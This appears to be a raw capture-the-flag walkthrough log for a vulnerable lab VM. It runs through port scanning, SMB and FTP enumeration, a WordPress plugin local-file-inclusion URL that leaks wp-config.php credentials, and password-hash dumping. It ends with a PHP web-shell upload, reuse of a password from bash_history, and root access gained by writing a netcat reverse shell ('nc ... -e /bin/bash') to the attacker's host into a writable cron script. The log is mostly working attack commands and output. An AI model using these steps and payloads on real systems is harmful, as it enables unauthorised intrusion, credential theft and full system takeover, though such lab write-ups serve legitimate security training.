└─$ nmap -p 20,21,22,53,80,123,137,138,139,666,3306,12380 -sV -A 172.16.226.129
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-05 21:21 HKT
Nmap scan report for 172.16.226.129
Host is up (0.00058s latency).

PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 172.16.226.130
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        PHP cli server 5.5 or later
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   tcpwrapped
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 10
|   Capabilities flags: 63487
|   Some Capabilities: InteractiveClient, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, Support41Auth, ODBCClient, LongPassword, Speaks41ProtocolOld, SupportsTransactions, LongColumnFlag, FoundRows, SupportsLoadDataLocal, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: x#O\x03D<\x0D\x14?\x18S\x17\x12
| (C\x17,"C
|_  Auth Plugin Name: mysql_native_password
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2024-05-05T22:22:17+01:00
| smb2-time: 
|   date: 2024-05-05T21:22:16
|_  start_date: N/A
|_clock-skew: mean: 7h39m58s, deviation: 34m37s, median: 7h59m57s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.95 seconds


#for ftp, get a file named note, cannot upload

Connected to 172.16.226.129.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220 
Name (172.16.226.129:kali): Anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
550 Permission denied.
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.

└─$ cat note                                                                                                     
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

ftp> put hash.txt
local: hash.txt remote: hash.txt
200 PORT command successful. Consider using PASV.
550 Permission denied.


#for 80. nothing suspicious 
└─$ dirsearch -u http://172.16.226.129/ -f php html                                           
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                 
 (_||| _) (/_(_|| (_| )                                                                          
                                                                                                 
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 26763

Output File: /home/kali/reports/http_172.16.226.129/__24-05-05_21-45-17.txt

Target: http://172.16.226.129/

[21:45:18] Starting:                                                                             
[21:45:18] 200 -  220B  - /.bash_logout                                     
[21:45:18] 200 -    4KB - /.bashrc                                          
[21:45:20] 200 -  675B  - /.profile  


└─$ dirsearch -u http://172.16.226.129:12380 -f php html                                         
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                 
 (_||| _) (/_(_|| (_| )                                                                          
                                                                                                 
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 26763

Output File: /home/kali/reports/http_172.16.226.129_12380/_24-05-05_21-54-10.txt

Target: http://172.16.226.129:12380/

[21:54:10] Starting:                                                                             
                                                                             
Task Completed                                                                                   


enum4linux IP
//172.16.226.129/kathy  Mapping: OK Listing: OK Writing: N/A
//172.16.226.129/tmp    Mapping: OK Listing: OK Writing: N/A

S-1-22-1-1000 Unix User\peter (Local User)                                                       
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)


smb: \> cd kathy_stuff\
smb: \kathy_stuff\> ls
  .                                   D        0  Sun Jun  5 23:02:27 2016
  ..                                  D        0  Sat Jun  4 00:52:52 2016
  todo-list.txt                       N       64  Sun Jun  5 23:02:27 2016

                19478204 blocks of size 1024. 16393820 blocks available
smb: \kathy_stuff\> get todo-list.txt 
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (5.2 KiloBytes/sec) (average 5.2 KiloBytes/sec)
smb: \kathy_stuff\> cd ..
smb: \> ls
  .                                   D        0  Sat Jun  4 00:52:52 2016
  ..                                  D        0  Tue Jun  7 05:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 23:02:27 2016
  backup                              D        0  Sun Jun  5 23:04:14 2016

                19478204 blocks of size 1024. 16393816 blocks available
smb: \> cd backup\
smb: \backup\> ls
  .                                   D        0  Sun Jun  5 23:04:14 2016
  ..                                  D        0  Sat Jun  4 00:52:52 2016
  vsftpd.conf                         N     5961  Sun Jun  5 23:03:45 2016
  wordpress-4.tar.gz                  N  6321767  Tue Apr 28 01:14:46 2015

└─$ cat todo-list.txt                                                                            
I'm making sure to backup anything important for Initech, Kathy



nc -nv IP 666 > message2

└─$ file message2                                                                                
message2: Zip archive data, at least v2.0 to extract, compression method=deflate

┌──(kali㉿kali)-[~]
└─$ unzip message2
Archive:  message2
  inflating: message2.jpg            


└─$ strings message2.jpg                                                                         
JFIF
vPhotoshop 3.0
8BIM
1If you are reading this, you should get a cookie!
8BIM
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
        #3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
/<}m
>,xr?
u-o[
Sxw]
v;]>
|_m7
l~!|0
<Elu
I[[k:>
>5[^k
;o{o
>xgH
mCXi
PE<R"
umcV
g[Y@=
[\Y_
\Oku
'X|(
?=?i
//Do
1okb
,>,&
n<;oc
*?      xC
~ |y
6{M6


#12380
https://172.16.226.129:12380/

Target: https://172.16.226.129:12380/

[22:36:54] Starting:                                                                             
[22:36:56] 403 -  303B  - /.ht_wsr.txt                                      
[22:36:56] 403 -  306B  - /.htaccess.bak1                                   
[22:36:56] 403 -  306B  - /.htaccess.save
[22:36:56] 403 -  306B  - /.htaccess.orig
[22:36:56] 403 -  307B  - /.htaccess_extra                                  
[22:36:56] 403 -  304B  - /.htaccess_sc
[22:36:56] 403 -  304B  - /.htaccessOLD
[22:36:56] 403 -  304B  - /.htaccessBAK
[22:36:56] 403 -  308B  - /.htaccess.sample                                 
[22:36:56] 403 -  297B  - /.html                                            
[22:36:56] 403 -  306B  - /.htaccess_orig
[22:36:56] 403 -  305B  - /.htaccessOLD2                                    
[22:36:56] 403 -  306B  - /.htpasswd_test                                   
[22:36:56] 403 -  302B  - /.htpasswds
[22:36:56] 403 -  296B  - /.htm                                             
[22:36:56] 403 -  303B  - /.httr-oauth                                      
[22:36:56] 403 -  296B  - /.php                                             
[22:36:56] 403 -  297B  - /.php3                                              
[22:37:16] 301 -  331B  - /javascript  ->  https://172.16.226.129:12380/javascript/
[22:37:22] 301 -  331B  - /phpmyadmin  ->  https://172.16.226.129:12380/phpmyadmin/
[22:37:23] 200 -    3KB - /phpmyadmin/doc/html/index.html                   
[22:37:23] 200 -    3KB - /phpmyadmin/                                      
[22:37:23] 200 -    3KB - /phpmyadmin/index.php                             
[22:37:26] 200 -   59B  - /robots.txt                                       
[22:37:27] 403 -  305B  - /server-status                                    
[22:37:27] 403 -  306B  - /server-status/   

https://172.16.226.129:12380/robots.txt

User-agent: *
Disallow: /admin112233/  # http://ww1.xss-payloads.com/?usid=18&utid=25723778798
Disallow: /blogblog/   # a wordpress pgge
    wp-content
    wp-admin

#under wp-content 
  /wp-content/readme.txt.  this is a wp plugin, may vulnerable to a exsploit
    === Advanced video embed  ===
Contributors: arshmultani,meenakshi.php.developer,DScom
Donate link: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=Z7C7DNDD9VS3L
Tags: advanced video embed,youtube video embed,auto poster, wordpress youtube playlist maker,wordpress youtube playlists,wordpress youtube plugin,wordpress youtube embed,wordpress videos youtube,wordpress youtube video shortcode,wordpress youtube video as post,video embed , wordpress video embeding plugin,
Requires at least: 3.0.1
Tested up to: 3.3.1
Stable tag: 1.0
Version: 1.0


└─$ searchsploit Advanced video
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                               |  Path
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Advanced Video 1.0 - Local File Inclusion                                                                                   | php/webapps/39646.py


#after read the content of exp, try to access the url below
https://192.168.56.4:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
https://192.168.56.4:12380/blogblog/?p=210


#then find a file under:   https://192.168.56.4:12380/blogblog/wp-content/uploads/

[ICO]	Name	Last modified	Size	Description
[PARENTDIR]	Parent Directory	 	- 	 
[IMG]	1871068732.jpeg	2024-05-06 12:00 	3.0K	 


#download it and view the strings of the .conf
ed@1nk:~$ strings 1871068732.jpeg 
<?php
 * The base configurations of the WordPress.
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 * @package WordPress
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
 * Authentication Unique Keys and Salts.
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 * @since 2.6.0
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');
/**#@-*/
 * WordPress Database Table prefix.
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
$table_prefix  = 'wp_';
 * For developers: WordPress debugging mode.
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define('WP_HTTP_BLOCK_EXTERNAL', true);

#got the user/passwd of mysql
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');


└─$ mysql -h 192.168.56.4 -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 18
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [wordpress]> select concat(user_pass,"-",user_login,"-",user_nicename) from wp_users;
+----------------------------------------------------+
| concat(user_pass,"-",user_login,"-",user_nicename) |
+----------------------------------------------------+
| $P$B7889EMq/erHIuZapMB8GEizebcIy9.-John-john       |
| $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0-Elly-elly       |
| $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0-Peter-peter     |
| $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0-barry-barry     |
| $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10-heather-heather |
| $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1-garry-garry     |
| $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0-harry-harry     |
| $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1-scott-scott     |
| $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0-kathy-kathy     |
| $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0-tim-tim         |
| $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1-ZOE-zoe         |
| $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.-Dave-dave       |
| $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0-Simon-simon     |
| $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.-Abby-abby       |
| $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131-Vicki-vicki     |
| $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0-Pam-pam         |
+----------------------------------------------------+
16 rows in set (0.002 sec)

#easyway to https://192.168.56.4:12380/phpmyadmin to edit the passwd of john,which maybe the admin of wp

#then go to https://192.168.56.4:12380/blogblog/wp-admin/plugin-install.php to upload web shell to wp


cp /usr/share/webshells/php/php-reverse-shell.php .

#after installed the wbshell, it could be found under
https://192.168.56.4:12380/blogblog/wp-content/uploads/
#https://192.168.56.4:12380/blogblog/wp-content/uploads/s.php access it afer nc listen...

└─$ nc -nvlp 4444                         
listening on [any] 4444 ...
connect to [192.168.56.5] from (UNKNOWN) [192.168.56.4] 40480
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
 17:35:36 up  7:19,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@red:/$ cat /etc/os*
cat /etc/os*
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
www-data@red:/$ uname -a
uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux



#info disclosing

www-data@red:/home/JKanode$ ls
ls
www-data@red:/home/JKanode$ ls -la
ls -la
total 24
drwxr-xr-x  2 JKanode JKanode 4096 Jun  5  2016 .
drwxr-xr-x 32 root    root    4096 Jun  4  2016 ..
-rw-r--r--  1 JKanode JKanode  167 Jun  5  2016 .bash_history
-rw-r--r--  1 JKanode JKanode  220 Sep  1  2015 .bash_logout
-rw-r--r--  1 JKanode JKanode 3771 Sep  1  2015 .bashrc
-rw-r--r--  1 JKanode JKanode  675 Sep  1  2015 .profile
www-data@red:/home/JKanode$ cat .bash_history
cat .bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit

#ssh peter
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q)  Quit and do nothing.  The function will be run again next time.

(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.

(1)  Continue to the main menu.

(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).

--- Type one of the keys in parentheses --- 2
prompt_adam1_setup:1: scalar parameter prompt_adam1_color1 created globally in function
prompt_adam1_setup:2: scalar parameter prompt_adam1_color2 created globally in function
prompt_adam1_setup:3: scalar parameter prompt_adam1_color3 created globally in function
prompt_adam1_setup:5: scalar parameter base_prompt created globally in function
prompt_adam1_setup:6: scalar parameter post_prompt created globally in function
prompt_adam1_setup:9: scalar parameter base_prompt_no_color created globally in function
prompt_adam1_setup:10: scalar parameter post_prompt_no_color created globally in function
/home/peter/.zshrc:15: scalar parameter HISTFILE created globally in function
(eval):1: scalar parameter LS_COLORS created globally in function
peter@red ~ % id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
peter@red ~ % sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter: 
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL
peter@red ~ % su   
Password: 
su: Authentication failure
peter@red ~ % sudo -s
root@red ~ # id
uid=0(root) gid=0(root) groups=0(root)

#way of crontab
www-data@red:/etc/cron.d$ cat logrotate
cat logrotate

*/5 *   * * *   root  /usr/local/sbin/cron-logrotate.sh
www-data@red:/etc/cron.d$ ls -la /usr/local/sbin/
ls -la /usr/local/sbin/
total 12
drwxr-xr-x  2 root root 4096 Jun  3  2016 .
drwxr-xr-x 10 root root 4096 Jun  3  2016 ..
-rwxrwxrwx  1 root root   51 Jun  3  2016 cron-logrotate.sh
www-data@red:/etc/cron.d$ echo "nc.tranditional 192.168.56.1 2212 -e /bin/bash" > /usr/local/sbin/cron-logrotate.sh    
<68.56.1 2212 -e /bin/bash" > /usr/local/sbin/cron-logrotate.sh  

Connection received on 192.168.56.4 50398
python -c "import pty;pty.spawn('/bin/bash')"
root@red:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@red:~# ls
ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
root@red:~# cat flag.txt
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b


